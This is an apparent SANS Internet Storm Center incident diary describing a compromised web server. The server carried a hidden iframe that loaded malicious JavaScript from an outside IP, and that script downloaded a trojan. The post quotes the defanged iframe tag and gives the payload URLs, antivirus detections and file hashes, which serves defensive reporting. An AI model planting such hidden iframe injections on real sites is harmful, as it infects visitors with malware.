Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Iframe > malicious javascript > trojan - SANS Internet Storm Center SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Iframe > malicious javascript > trojan

Another iframe on a compromised server pointing to javascript which then downloads malware. Jeff wrote in to tell us about a web server that had an iframe like this:

<bo dy><i frame src='hxxp:// 81.95.149.28/logo/ index.php' width='1' height='1' style='visibility: hidden;'></i frame>

The unencode javascript at 81.95.149.28/logo/ index.php then downloaded and ran hxxp:// 81.95.149.28/logo/ file.php , a binary PE trojan.

Here is what virstotal had to say about file.php:


AntiVir 7.4.0.32 06.05.2007 TR/Small.MI.25
AVG 7.5.0.467 06.05.2007 Generic4.SJO
BitDefender 7.2 06.05.2007 Trojan.Agent.AXB
DrWeb 4.33 06.05.2007 Trojan.DownLoader.23162
eSafe 7.0.15.0 06.05.2007 Win32.Small.mi
eTrust-Vet 30.7.3693 06.05.2007 Win32/Chepvil!generic
Ewido 4.0 06.05.2007 Trojan.Small.mi
F-Secure 6.70.13030.0 06.05.2007 Trojan.Win32.Small.mi
Ikarus T3.1.1.8 06.05.2007 Trojan.Win32.Small.mi
Kaspersky 4.0.2.24 06.05.2007 Trojan.Win32.Small.mi
Microsoft 1.2503 06.05.2007 TrojanDownloader:Win32/Agent!EF3C
Norman 5.80.02 06.05.2007 W32/Smalltroj.BHMK
Prevx1 V2 06.05.2007 Polynomial.Code.Exploit
Sophos 4.18.0 06.01.2007 Mal/Clagger-E
TheHacker 6.1.6.129 06.04.2007 Trojan/Small.mi
VirusBuster 4.3.23:9 06.05.2007 no virus found
Webwasher-Gateway 6.0.1 06.05.2007 Trojan.Small.MI.25

Aditional Information
File size: 6767 bytes
MD5: 3cefdebc529c408c8ba9ef20a0b6291c
SHA1: 4d3599829828e90f6e27b886c9ee403163fc91f6
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=e09499856113

The server has since had the iframe removed. The owner was a little less than gracious when we spoke this morning. He was aware that it was compromised and infecting web users. If you are notified that a system you run or own is involved in an incident please take action as soon as you can.

Cheers,
Adrien
Adrien de Beaupre

353 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!